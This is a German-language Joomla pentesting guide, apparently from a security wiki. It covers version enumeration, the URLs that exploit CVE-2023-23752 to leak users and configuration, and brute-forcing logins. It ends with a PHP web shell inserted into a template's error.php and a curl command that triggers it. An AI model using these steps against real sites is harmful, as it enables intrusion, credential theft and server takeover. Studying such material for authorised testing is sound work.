Joomla
Joomla-Statistiken
Joomla sammelt einige anonyme Nutzungsstatistiken wie die Aufschlüsselung der Joomla-, PHP- und Datenbankversionen sowie der verwendeten Betriebssysteme auf Joomla-Installationen. Diese Daten können über ihre öffentliche API abgefragt werden.
Enumeration
Entdeckung/Fußabdruck
Überprüfen Sie die Meta
robots.txt
README.txt
Joomla
Joomla-Website-Pentesting
Joomla ist ein beliebtes Content-Management-System (CMS), das für Websites verwendet wird. Beim Pentesting von Joomla-Websites gibt es einige wichtige Punkte zu beachten:
Versionsüberprüfung: Stellen Sie sicher, dass Sie die genaue Joomla-Version identifizieren, da ältere Versionen möglicherweise anfällig für bekannte Schwachstellen sind.
Bruteforce-Angriffe: Führen Sie Bruteforce-Angriffe auf die Login-Seite durch, um schwache Passwörter zu identifizieren.
SQL-Injection: Überprüfen Sie die Website auf mögliche SQL-Injection-Schwachstellen, insbesondere in Formularen oder Suchfunktionen.
Datei-Upload: Testen Sie die Website auf Schwachstellen im Datei-Upload-Prozess, um zu verhindern, dass bösartige Dateien hochgeladen werden.
Plug-in-Schwachstellen: Überprüfen Sie alle installierten Plug-ins auf bekannte Sicherheitslücken und aktualisieren Sie sie regelmäßig.
Verzeichnis-Traversal: Stellen Sie sicher, dass die Website nicht anfällig für Verzeichnis-Traversal-Angriffe ist, bei denen ein Angreifer auf Dateien außerhalb des Webverzeichnisses zugreifen kann.
Durch die Durchführung dieser Tests können Sie die Sicherheit einer Joomla-Website verbessern und potenzielle Schwachstellen identifizieren, die behoben werden müssen.
Version
In /administrator/manifests/files/joomla.xml können Sie die Version sehen.
In /language/en-GB/en-GB.xml können Sie die Version von Joomla erhalten.
In plugins/system/cache/cache.xml können Sie eine ungefähre Version sehen.
In 80,443 - Pentesting Web Methodology ist ein Abschnitt über CMS-Scanner, die Joomla scannen können.
API Unauthenticated Information Disclosure:
Versionen von 4.0.0 bis 4.2.7 sind anfällig für unauthentifizierte Informationsfreigabe (CVE-2023-23752), die Anmeldeinformationen und andere Informationen preisgeben wird.
Benutzer:
http://<host>/api/v1/users?public=true
Konfigurationsdatei:
http://<host>/api/index.php/v1/config/application?public=true
MSF-Modul: scanner/http/joomla_api_improper_access_checks
oder Ruby-Skript: 51334
Brute-Force
Sie können dieses Skript verwenden, um versuchen, das Login per Brute-Force zu knacken.
RCE
Wenn es Ihnen gelungen ist, Admin-Anmeldeinformationen zu erhalten, können Sie RCE darin durch das Hinzufügen eines Schnipsels von PHP-Code erlangen, um RCE zu erlangen. Dies können wir tun, indem wir eine Vorlage anpassen.
Klicken Sie auf
Templates
unten links unterConfiguration
, um das Vorlagenmenü aufzurufen.Klicken Sie auf einen Vorlagennamen. Wählen wir
protostar
unter demTemplate
-Spaltenheader aus. Dadurch gelangen wir zur SeiteTemplates: Customise
.Klicken Sie schließlich auf eine Seite, um den Seitenquelltext aufzurufen. Wählen wir die Seite
error.php
aus. Wir fügen einen PHP-Einzeller hinzu, um Codeausführung zu erlangen, wie folgt:system($_GET['cmd']);
Speichern & Schließen
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Last updated